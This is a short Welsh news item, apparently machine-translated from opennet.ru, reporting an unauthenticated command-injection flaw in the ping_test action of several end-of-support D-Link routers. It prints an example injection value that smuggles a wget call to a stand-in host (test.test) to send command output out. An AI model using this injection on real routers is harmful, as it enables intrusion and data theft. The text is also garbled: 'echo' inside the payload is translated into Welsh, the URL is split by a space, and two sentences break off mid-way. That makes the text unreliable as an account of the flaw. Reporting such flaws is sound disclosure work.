Mewn llwybryddion diwifr D-Link
Yn ddiddorol, yn ôl y datblygwyr firmware, dim ond ar ôl dilysu y dylid gweithredu'r alwad “ping_test”, ond mewn gwirionedd fe'i gelwir yn unrhyw achos, waeth beth fo mewngofnodi i'r rhyngwyneb gwe. Yn benodol, wrth gyrchu'r sgript app_sec.cgi a phasio'r paramedr “action=ping_test”, mae'r sgript yn ailgyfeirio i'r dudalen ddilysu, ond ar yr un pryd yn cyflawni'r weithred sy'n gysylltiedig â ping_test. I weithredu'r cod, defnyddiwyd bregusrwydd arall yn ping_test ei hun, sy'n galw'r cyfleustodau ping heb wirio cywirdeb y cyfeiriad IP a anfonwyd i'w brofi yn iawn. Er enghraifft, i alw'r cyfleustodau wget a throsglwyddo canlyniadau'r gorchymyn “echo 1234” i westeiwr allanol, nodwch y paramedr “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( adlais 1234)".
Mae presenoldeb y bregusrwydd wedi'i gadarnhau'n swyddogol yn y modelau canlynol:
- DIR-655 gyda firmware 3.02b05 neu hŷn;
- DIR-866L gyda firmware 1.03b04 neu hŷn;
- DIR-1565 gyda firmware 1.01 neu hŷn;
- DIR-652 (ni ddarperir gwybodaeth am fersiynau cadarnwedd problemus)
Mae'r cyfnod cymorth ar gyfer y modelau hyn eisoes wedi dod i ben, felly D-Link
Darganfuwyd yn ddiweddarach bod y bregusrwydd hefyd
Ffynhonnell: opennet.ru